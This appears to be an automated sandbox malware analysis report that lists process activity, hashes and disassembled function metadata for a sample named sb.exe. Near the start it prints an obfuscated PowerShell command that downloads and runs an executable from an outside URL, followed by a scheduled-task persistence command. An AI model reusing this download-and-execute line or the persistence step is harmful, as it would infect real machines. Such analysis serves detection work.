Wow64 process (32bit):	false
Commandline:	mode 18,1
Imagebase:	0xff2d0000
File size:	30208 bytes
MD5 hash:	718E86CB060170430D4EF70EE39F93D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2320 Parent PID: 2164

General

Start time:	10:06:57
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ver
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2232 Parent PID: 2164

General

Start time:	10:06:57
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1520 Parent PID: 2232

General

Start time:	10:06:58
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: sb.exe PID: 1464 Parent PID: 1520

General

Start time:	10:07:03
Start date:	05/01/2021
Path:	C:\Users\user\AppData\Roaming\sb.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\sb.exe'
Imagebase:	0xcd0000
File size:	3485696 bytes
MD5 hash:	1C1BDD57483BBFBB497B4596BE12B053
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2436 Parent PID: 1464

General

Start time:	10:07:43
Start date:	05/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
Imagebase:	0x270000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sb.exe PID: 1192 Parent PID: 1464

General

Start time:	10:07:45
Start date:	05/01/2021
Path:	C:\Users\user\AppData\Roaming\sb.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xcd0000
File size:	3485696 bytes
MD5 hash:	1C1BDD57483BBFBB497B4596BE12B053
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 2364 Parent PID: 2504 powershell.exeCOMMON

Executed Functions

Function 000007FF00251361, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121101814.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88b5524a159ccf3549522245130fa40b034573b3258b31fcc484ad3cf13b65ce
Instruction ID: 0954731835269be0cdfda46f74ca715b3542bb71928fdcb14f9236b80d44def7
Opcode Fuzzy Hash: 88b5524a159ccf3549522245130fa40b034573b3258b31fcc484ad3cf13b65ce
Instruction Fuzzy Hash: 1511E26244E7D14FD3038B389C612A07FB0AF63215F5A55EBC4C4CB0E3E65D0A2AC762

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF0025103C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121101814.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3aee4cd0fa7d8fbec70c366185a7be17a08e313577f83585cc3fc20fcf5743
Instruction ID: e31e2264049d4e6d495347864ad27e0392f2e1e9a913ffa0b73742aabca8c33e
Opcode Fuzzy Hash: 4c3aee4cd0fa7d8fbec70c366185a7be17a08e313577f83585cc3fc20fcf5743
Instruction Fuzzy Hash: 5701446684E7C54FD3034B785CA16A03F71AF17214B1A01D3C080CB0B3D28C499AD762

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 1468 Parent PID: 2772 powershell.exeCOMMON

Executed Functions

Function 000007FF0025089A, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2127769620.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c09912818b83fff28e4c9fd80fa3c34040d87996314be1f3964c2f232a9b144e
Instruction ID: b86984331925dd1caa679995d85c1558285fcae2c01d00ad4ad1f8a3b13afe97
Opcode Fuzzy Hash: c09912818b83fff28e4c9fd80fa3c34040d87996314be1f3964c2f232a9b144e
Instruction Fuzzy Hash: 78E0D810719D0B0FFB906A6C684B7B473C1E754313F50007AE80DC2292DD79D94142C1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 1520 Parent PID: 2232 powershell.exeCOMMON

Executed Functions

Function 000007FF0027083B, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2150452729.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed1dc88dfcafaaa2d6b467e31909f9b1686eb35c776baa77a4d63e9d85aaae8
Instruction ID: 3ee218a25f844ac1d1a6639e8e1c243689dd11136abcd1f9807b88c6921e7a10
Opcode Fuzzy Hash: 7ed1dc88dfcafaaa2d6b467e31909f9b1686eb35c776baa77a4d63e9d85aaae8
Instruction Fuzzy Hash: 2241AF2050EBC64FE7575778586A7B17FA0EF17210F0A00EBE488CB1A3D9585D59C3A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: sb.exe PID: 1464 Parent PID: 1520 sb.exeCOMMON

Executed Functions

Function 00321800, Relevance: 3.4, Strings: 2, Instructions: 936COMMON

Download Yara Rule

Strings

:@lq, xrefs: 003224C8
_qq, xrefs: 0032259D

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq
API String ID: 0-1078395745
Opcode ID: a9fa39f2885554b435b8be782c6d5b08d4605fae9630c34673efb88585051f80
Instruction ID: 8b8aa951c0534b0c531ad114ce2e5342e5337193cb03c94c99a9454f884466a7
Opcode Fuzzy Hash: a9fa39f2885554b435b8be782c6d5b08d4605fae9630c34673efb88585051f80
Instruction Fuzzy Hash: ECA2E375C05228CFDB29CFA6D9487EDBBB5BB48309F1480EAC409A7291D7794AC9DF10

Uniqueness

Uniqueness Score: -1.00%

Function 003217F8, Relevance: 3.1, Strings: 2, Instructions: 592COMMON

Download Yara Rule

Strings

:@lq, xrefs: 003224C8
_qq, xrefs: 0032259D

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq
API String ID: 0-1078395745
Opcode ID: 8518d63aa9e07c8868de16fcc65ec783fc62a562859ae86d99a316ca54bcaf7d
Instruction ID: a81a346221261e3a4dcbcd07bfb4b06a77f41eb34ca85fce1599521aa2310dfc
Opcode Fuzzy Hash: 8518d63aa9e07c8868de16fcc65ec783fc62a562859ae86d99a316ca54bcaf7d
Instruction Fuzzy Hash: 1E52F475D01268CFDB29DFA6C9587EDBBB6BB88305F1480EAC509A7291C7744E88CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009B2AF7, Relevance: 2.0, Strings: 1, Instructions: 779COMMON

Download Yara Rule

Strings

(, xrefs: 009B3373

Memory Dump Source

Source File: 00000018.00000002.2228242989.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 16d16111a6711428dfd2a959e910241cf3809a3ba1315e063010bcc7e6255c68
Instruction ID: 62f384ec67898bd1ffa145cdde7c6cfd9dcb006aac7f4d4ded2bd0f31fea7962
Opcode Fuzzy Hash: 16d16111a6711428dfd2a959e910241cf3809a3ba1315e063010bcc7e6255c68
Instruction Fuzzy Hash: C372027094A229CFDB64DF24CA84BE9BBB5AB59310F2095E9D00DA3291DB784FC5DF01

Uniqueness

Uniqueness Score: -1.00%

Function 009B2B1C, Relevance: 1.9, Strings: 1, Instructions: 669COMMON

Download Yara Rule

Strings

(, xrefs: 009B3373

Memory Dump Source

Source File: 00000018.00000002.2228242989.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: bd1a44ce45d93bf382f62f64bd1be75580c4db9f8a18dd3f35921f37fc637d7f
Instruction ID: 781f420a81b9faeb7a9d765fb7c0f92e4aa7574131bb4b0401eee35023eebd07
Opcode Fuzzy Hash: bd1a44ce45d93bf382f62f64bd1be75580c4db9f8a18dd3f35921f37fc637d7f
Instruction Fuzzy Hash: BE52107094A229CFDB64DF25CA84BEDB7B5AB99310F2095E9D04DA3291DB784EC4DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00326414, Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

@+@, xrefs: 00326489

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: @+@
API String ID: 0-2407000107
Opcode ID: d84b19aa2df2b3802cc1351ffc89388fdcc3dad79c4e56325b6037b14c0ca9f2
Instruction ID: e3f1a2c02bed4e527e42d9395f6465523987ef7f22a0cdbae71db1e9e2ba6fd8
Opcode Fuzzy Hash: d84b19aa2df2b3802cc1351ffc89388fdcc3dad79c4e56325b6037b14c0ca9f2
Instruction Fuzzy Hash: 4D215E75A04249EFCB01DFB4D5545AEFBB2FF8B31071481AAD445AB261CB316942DB44

Uniqueness

Uniqueness Score: -1.00%

Function 003204FC, Relevance: 1.0, Instructions: 1045COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676c16f5a6009940aa0b55d7e85e13b49526ff795cbab06b0e0c3df05c00ca00
Instruction ID: f205ae87cf68a8a7f629cd439702fea012da3c4e883ca6f010dc44c2ebe9e6e3
Opcode Fuzzy Hash: 676c16f5a6009940aa0b55d7e85e13b49526ff795cbab06b0e0c3df05c00ca00
Instruction Fuzzy Hash: 11B2C234A01259CFCB54DB64C994BEDB7B2BF8A300F5085EAE5096B365DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00320500, Relevance: 1.0, Instructions: 1045COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145bb65136ba160e408af6eabc1548c47b10ace5c1c2fdc315ebd25f1dcc4992
Instruction ID: 6f5255fb09927f647c59056c7fe417cc5dca84432089e0feb55e7def1a3e5db8
Opcode Fuzzy Hash: 145bb65136ba160e408af6eabc1548c47b10ace5c1c2fdc315ebd25f1dcc4992
Instruction Fuzzy Hash: 45B2C234A01259CFCB54DB64C994BEDB7B2BF8A300F5085EAE5096B365DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00322E00, Relevance: 1.0, Instructions: 984COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59af5dc961a4bb97eb851c19350649a5e5c2c0372c213f40f27e4f9831516a2e
Instruction ID: 43033f727f33c8428a876beaa802cc002b82b985d19bfe6be10ad66ee1e742d9
Opcode Fuzzy Hash: 59af5dc961a4bb97eb851c19350649a5e5c2c0372c213f40f27e4f9831516a2e
Instruction Fuzzy Hash: 62B2CF75E00228DFDB65DF69C984BD9BBB2BF89304F1481E9D409AB225DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00326C3C, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7ac7ca9b85c260ae625c24c6969291b616a0ecb670e88c51013c4f82ce4f6e
Instruction ID: 5599dc9a1db440b73b431ef53ffc12eada55677f4a2f0142d65804f115b38921
Opcode Fuzzy Hash: bd7ac7ca9b85c260ae625c24c6969291b616a0ecb670e88c51013c4f82ce4f6e
Instruction Fuzzy Hash: 5822F174A05228CFDB25DF64D959BECBBB5BF49300F2090E9E409A72A1CB705E85DF41

Uniqueness

Uniqueness Score: -1.00%

Function 0032F29B, Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6673017dcef7d1f5ce29d254e204b78447bcd2301f41b6f329a8a34c6d096c94
Instruction ID: 9939e66a1ac5d9b693fddfeb121abd553f6c32c4f2e5ed117e5827543b2380dc
Opcode Fuzzy Hash: 6673017dcef7d1f5ce29d254e204b78447bcd2301f41b6f329a8a34c6d096c94
Instruction Fuzzy Hash: 6AC16874D09229CFDB25DF69E9447FDB6B8BB4A301F2091BAC009B22A1D7744AC4DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00328FB6, Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2781a3219dfab9f94024bd5a6e582fcba706dbb4e635bb5ad3b96d83050a0cab
Instruction ID: a9fcd0535c26fa519fb520cc152d918b19579c4d6b98c99f1e814eba5d60ba9c
Opcode Fuzzy Hash: 2781a3219dfab9f94024bd5a6e582fcba706dbb4e635bb5ad3b96d83050a0cab
Instruction Fuzzy Hash: AEC10374D0421DDBDB01DF99E580AEDFBBAFF49300F25952AD819BB205D730AA86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0032F740, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c8c6ef02f1010c1f58abf3ae30fc3d4abdbffcbe1a0b6dee1811fc8a601ecb
Instruction ID: 249aa96b2be62ad9aed4413df3adf9d27c1313ea66f6c997798c1a1dacc0d5f1
Opcode Fuzzy Hash: 01c8c6ef02f1010c1f58abf3ae30fc3d4abdbffcbe1a0b6dee1811fc8a601ecb
Instruction Fuzzy Hash: EAB15774D09229CFDB29DF69E9447FDB6B9BB4A305F2091BAC009B22A1D7744AC0DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00325108, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2d3bfda6a43bd0e0c1425df9bb965ec7bb3db5ed266fdf6efeb2dec8964512
Instruction ID: 70477fdbafb66549ef996707bc9a4eac6874e59923265164144702dd295f67d5
Opcode Fuzzy Hash: 2c2d3bfda6a43bd0e0c1425df9bb965ec7bb3db5ed266fdf6efeb2dec8964512
Instruction Fuzzy Hash: 9F418E71F046688BEB19DF6AD85079EBBF7AFC9700F24C06AD508EB255DB305E028B51

Uniqueness

Uniqueness Score: -1.00%

Function 00325958, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6bf294fb2d20cd1c820bf404f7ee171b47e18e99b8d42f9826e65b0ea3fd406
Instruction ID: aa3a996b5f4fd3cd11277d9ae9c48fe9891c819e4527e28b2c176632e9657f46
Opcode Fuzzy Hash: a6bf294fb2d20cd1c820bf404f7ee171b47e18e99b8d42f9826e65b0ea3fd406
Instruction Fuzzy Hash: 5411DA71D05648CBEB09CFAB98442DEBFF7AFC9300F14C07AC449A6265E73406459F51

Uniqueness

Uniqueness Score: -1.00%

Function 00325968, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e2a30220428df39a50b7fbb3bd6f43d4beeb5209c9c1d5eff8d8ab13e3d701
Instruction ID: 0a2db75b8682e8cc8440123dc40bbb53db3e7420869ec2e58c37114c8729aec7
Opcode Fuzzy Hash: 27e2a30220428df39a50b7fbb3bd6f43d4beeb5209c9c1d5eff8d8ab13e3d701
Instruction Fuzzy Hash: BF01CC71E05619DBEB08DFABD9442DEFAF7AFC9300F14C07AC408A6268EB3406459F55

Uniqueness

Uniqueness Score: -1.00%

Function 003B181F, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 003B18CF

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4cce1b929441011901fc061fa838f91164f5289460b6237498900e4159868c8b
Instruction ID: f7e0d8dcfe398bd120fbd781dc7d7885deecb020c464c01b19e3408461489b8c
Opcode Fuzzy Hash: 4cce1b929441011901fc061fa838f91164f5289460b6237498900e4159868c8b
Instruction Fuzzy Hash: 9A31B472504384AFE7228F21CC45FA6BFACEF06310F05459BF985CB552D225A909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 001CA2AC, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001CA346

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 1c61edb74dd72f89aa294e4591438f5b2423eee7a8f66f0064ed9b5616643750
Instruction ID: 08ae3fb2ea898b63419496bf846bb2d240269ac26b2d4c754dcca9f6f6f5977d
Opcode Fuzzy Hash: 1c61edb74dd72f89aa294e4591438f5b2423eee7a8f66f0064ed9b5616643750
Instruction Fuzzy Hash: D8319C6140E3C05FD3138B319C65B21BFB4EF57624F0A41DBE884CB5A3D219A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 003B110E, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B11B8

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 44d6617413e73a8ebcd1621424a62f81a811f8fec6931bd2bd98f98312230043
Instruction ID: af9c7500150aa7ccb60cb703e71350b763413dd6d79b75d69fe5d55a43154456
Opcode Fuzzy Hash: 44d6617413e73a8ebcd1621424a62f81a811f8fec6931bd2bd98f98312230043
Instruction Fuzzy Hash: EC31B675509384AFEB12CF24DC45FA6BFB8EF06314F0984DAE984DB193D625A908C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 001CAC22, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001CACD1

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 11d6e7ae7f5c92719c5e3513812b24fa297ae34942dc53486952b2e1b29f51bf
Instruction ID: b5fa27b38358e3964120fccb992d3c09c95caa9f331864d78a439885f3cd0083
Opcode Fuzzy Hash: 11d6e7ae7f5c92719c5e3513812b24fa297ae34942dc53486952b2e1b29f51bf
Instruction Fuzzy Hash: 7A31A072544384AFE722CF51DC45FA7BFACEF06310F0885AAF9858B152D265E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 003B0BF0, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 003B0C91

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac1a26151c3064c974c0119f7edca6d75715f233f82c4846dc1ba3efabc6e69c
Instruction ID: 431f0cc8049a04b25397e3e8daf3a49c94e2dd37a07d36cf0db6289d80e02bef
Opcode Fuzzy Hash: ac1a26151c3064c974c0119f7edca6d75715f233f82c4846dc1ba3efabc6e69c
Instruction Fuzzy Hash: 6A319071504340AFE722CF25CC44FA6BFE8EF05214F0485AEE9888B652D375E805CB31

Uniqueness

Uniqueness Score: -1.00%

Function 001CAD19, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 001CADD4

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e03eb7d66006d900788f70eb7dc7cfdb9b5f4af6d8a8de15d8ae9f20a0f2fd94
Instruction ID: 3cf8c09710fa923299c73d9c32b501056ee1ee90d7716573478588587073e85b
Opcode Fuzzy Hash: e03eb7d66006d900788f70eb7dc7cfdb9b5f4af6d8a8de15d8ae9f20a0f2fd94
Instruction Fuzzy Hash: ED3193715093849FE722CF61DC45FA2BFB8EF06314F08849AE945CB192D364E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B143F, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 003B14DB

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: 99cac4684bbb615f16b736a81a86c20fa2b21c2bb1336415db93933cde3c9b8b
Instruction ID: 4f0997ca23584e1da09dac73091df62295702f0de7de31a8a6b1a0c6c57948a9
Opcode Fuzzy Hash: 99cac4684bbb615f16b736a81a86c20fa2b21c2bb1336415db93933cde3c9b8b
Instruction Fuzzy Hash: C8219172504344AFE721CF25DC45FA6FFB8EF45310F08849AED849B152D225A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B1852, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 003B18CF

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 256395fd3b9f375ab228aa697dd732fae938ae46ad2dcb6d3a15a4a20d90341f
Instruction ID: 6312565e85d0bd398f5aa0e03404c3c0021e1d5a6866aa8c99d2de648d92b840
Opcode Fuzzy Hash: 256395fd3b9f375ab228aa697dd732fae938ae46ad2dcb6d3a15a4a20d90341f
Instruction Fuzzy Hash: 6321C172500304EFEB21DF51CC45FAAFBECEF04350F04896AFA45DA551D635E9489BA1

Uniqueness

Uniqueness Score: -1.00%

Function 003B192D, Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 003B19B4

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: be86d56cfe01111add21c4df0ceab6274c133324b8fcef408bd58bdf23a1d2ea
Instruction ID: 55e2d4675eaf69d17d3b09976f0ad50e48eda90774cfc8777af458488df63366
Opcode Fuzzy Hash: be86d56cfe01111add21c4df0ceab6274c133324b8fcef408bd58bdf23a1d2ea
Instruction Fuzzy Hash: E121B0725097C49FEB13CB25DC55B92BFA4EF07224F0984DADD84CF2A3D225A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B0C12, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 003B0C91

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7f0515d8caddf89084d63876cb0d93a74aff5fac6321330591ca7200feb84f56
Instruction ID: 78a31aecfcf2fc271d9042fd8abfe821954edbfa83f35e40ba75ec5b6458c720
Opcode Fuzzy Hash: 7f0515d8caddf89084d63876cb0d93a74aff5fac6321330591ca7200feb84f56
Instruction Fuzzy Hash: 1C21BD71500304EFEB21CF65CC85BA6FBE8EF08314F04856EEA498B652D371E804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CAC52, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001CACD1

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 992e234aed2caee6730b1ed37693b29810ddbd4bca2c292b5f35dbd9d3b0d9c3
Instruction ID: f8fbff77e4bcaab95b32285bb568331a800bd266252c0630b337a40e7b351ee9
Opcode Fuzzy Hash: 992e234aed2caee6730b1ed37693b29810ddbd4bca2c292b5f35dbd9d3b0d9c3
Instruction Fuzzy Hash: 1021DE72500304EFFB21DF51DC84FABFBACEF14364F04855AFA458A641D724E9088AB2

Uniqueness

Uniqueness Score: -1.00%

Function 003B0DA3, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B0E29

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b43a0e56f6f439bcdb7261e28da5de648f570a435abd585234099233d21fd1f6
Instruction ID: 151e8a6854d85836056ca5ed1944dd99aa10f76124262ed344c98c11ac567844
Opcode Fuzzy Hash: b43a0e56f6f439bcdb7261e28da5de648f570a435abd585234099233d21fd1f6
Instruction Fuzzy Hash: CF21E7B5409780AFE7128B11DC41FA3BFA8EF47714F0984DBF9848B193D268A909D771

Uniqueness

Uniqueness Score: -1.00%

Function 003B146A, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 003B14DB

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: b643a812ea2a7925d38b9665e4e36d4cd0d15af2f6679431242d67022e391315
Instruction ID: 695a8a9270603837eecc4de6cf8ea494d35c51c22800f49a11c9bf20324c4ad6
Opcode Fuzzy Hash: b643a812ea2a7925d38b9665e4e36d4cd0d15af2f6679431242d67022e391315
